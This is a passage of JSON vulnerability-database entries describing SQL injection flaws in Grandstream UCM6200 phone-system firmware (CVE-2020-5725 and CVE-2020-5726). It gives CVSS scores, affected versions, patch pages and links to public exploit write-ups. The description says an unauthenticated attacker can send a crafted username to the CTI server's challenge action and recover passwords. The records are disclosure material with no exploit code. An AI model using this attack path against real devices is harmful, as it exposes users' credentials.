        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/156976/grandstream-ucm6200-series-websocket-1.0.20.20-sql-injection.html"
      },
      {
        "trust": 1.6,
        "url": "https://www.tenable.com/security/research/tra-2020-17"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5725"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5725"
      },
      {
        "trust": 0.8,
        "url": "https://jp.tenable.com/security/research/tra-2020-17?tns_redirect=true"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "date": "2020-03-30T20:15:20.133000",
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-01T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003470"
      },
      {
        "date": "2020-03-31T17:15:26.730000",
        "db": "NVD",
        "id": "CVE-2020-5725"
      },
      {
        "date": "2020-04-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Grandstream UCM6200 SQL injection vulnerability",
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20682"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ],
    "trust": 1.2
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1715"
      }
    ],
    "trust": 0.6
  }
}

VAR-202003-1439

Vulnerability from variot - Updated: 2023-12-18 12:17

The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a series of enterprise-level switches for IP telephone communication, made by the US company Grandstream.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1439",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ucm6208",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6202",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6204",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6208",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      },
      {
        "model": "ucm6200",
        "scope": "lt",
        "trust": 0.6,
        "vendor": "grandstream",
        "version": "1.0.20.22"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.20.22",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Jacob Baines",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-5726",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003471",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-24401",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003471",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5726",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003471",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-24401",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1716",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a series of enterprise-level switches for IP telephone communication, made by the US company Grandstream.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5726",
        "trust": 3.0
      },
      {
        "db": "TENABLE",
        "id": "TRA-2020-17",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "156977",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "48270",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "id": "VAR-202003-1439",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      }
    ],
    "trust": 1.45714287
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:17:13.076000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.grandstream.com/"
      },
      {
        "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-24401)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/215057"
      },
      {
        "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113111"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "https://www.tenable.com/security/research/tra-2020-17"
      },
      {
        "trust": 1.6,
        "url": "http://packetstormsecurity.com/files/156977/grandstream-ucm6200-series-cti-interface-sql-injection.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5726"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5726"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/48270"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-23T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "date": "2020-03-30T20:15:20.180000",
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "date": "2020-03-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-23T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-24401"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      },
      {
        "date": "2020-03-31T17:15:26.887000",
        "db": "NVD",
        "id": "CVE-2020-5726"
      },
      {
        "date": "2020-04-01T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection vulnerabilities in the Grandstream UCM6200 series",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003471"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1716"
      }
    ],
    "trust": 0.6
  }
}